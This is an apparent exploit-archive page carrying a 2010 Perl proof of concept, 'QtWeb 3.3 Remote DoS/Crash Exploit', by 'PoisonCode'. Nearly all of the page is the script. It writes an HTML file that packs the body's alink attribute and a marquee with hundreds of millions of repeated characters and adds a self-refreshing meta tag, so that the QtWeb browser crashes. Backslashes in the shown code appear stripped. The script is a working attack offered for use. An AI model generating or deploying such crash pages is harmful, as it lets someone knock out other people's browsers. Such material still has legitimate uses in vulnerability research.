[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : QtWeb 3.3 Remote DoS/Crash Exploit
# Published : 2010-06-03
# Author : PoisonCode
# Previous Title : Member ID The Fish Index PHP SQL Injection Vulnerability
# Next Title : phpBazar V2.1.1 stable rfi Vulnerability


# Title:QtWeb 3.3 Remote DoS/Crash Exploit
# Software Link:http://www.qtweb.net/downloads/QtWeb-setup.exe
# Portable: http://www.qtweb.net/downloads/QtWeb.exe
# Version: 3.3
# Platform:Windows


_____    _____                      _ _         
|  __  / ____|                    (_) |        
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _ 
|  ___/ ___  / _ / __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ ___|___|__,_|_|  |_|__|__, |
                                           __/ |
                                          |___/
Exploit
----------------
#!/usr/bin/perl
# File Name :QtWeb 3.3 Remote DoS/Crash Exploit
# Vuln :Remote Dos/Crash
# Author :PoisonCode
# Exploit Title: QtWeb 3.3 Remote DoS/Crash Exploit
# Date:02/06/2010
# Author:PoisonCode
# Site  :http://www.qtweb.net/
# Software Link: http://www.qtweb.net/downloads/QtWeb-setup.exe
# Portable:http://www.qtweb.net/downloads/QtWeb.exe
# Version: 3.3
# Tested on: Windows
$file="Exploit QtWeb 3.3.html";
print " ======================================n";
print " = QtWeb 3.3 Remote DoS/Crash Exploit =n";
print " =        Autor:PoisonCode            =n";
print " =  Web :PanamaSecurity.blogspot.com  =n";
print " ======================================n";
print "n";
print " Espere Mientras se Genera el Exploitn";
my $a="x55" x 100000000;
my $b="85" x 55900000;
my $c="x7Cx95x64xAEx00x96xbdx40x00x098a86x5Ax65x72x30x0x54x68x75x6Ex64x65x72"; 
open(myfile,">>$file"); 
print myfile "<html>";
print myfile "<title>PanamaSecurity - PoisonCode $c </title>";
print myfile '<head><meta http-equiv="refresh" content="0; url=Exploit QtWeb3.3.html"></head>';
print myfile "<body alink=";
print myfile $a,$b,$c;
print myfile "<marquee>$a,$b,$c</marquee>";
print myfile '">';
print myfile "</html>";
close(myfile);
print "n";
print " Nombre del Archivo : $filen";
print " Se Ha Creado El Exploit Correctamente n";
print "n";
print "----------------------------------------------------------------------n";
print " Visiten : PanamaSecurity.blogspot.comn";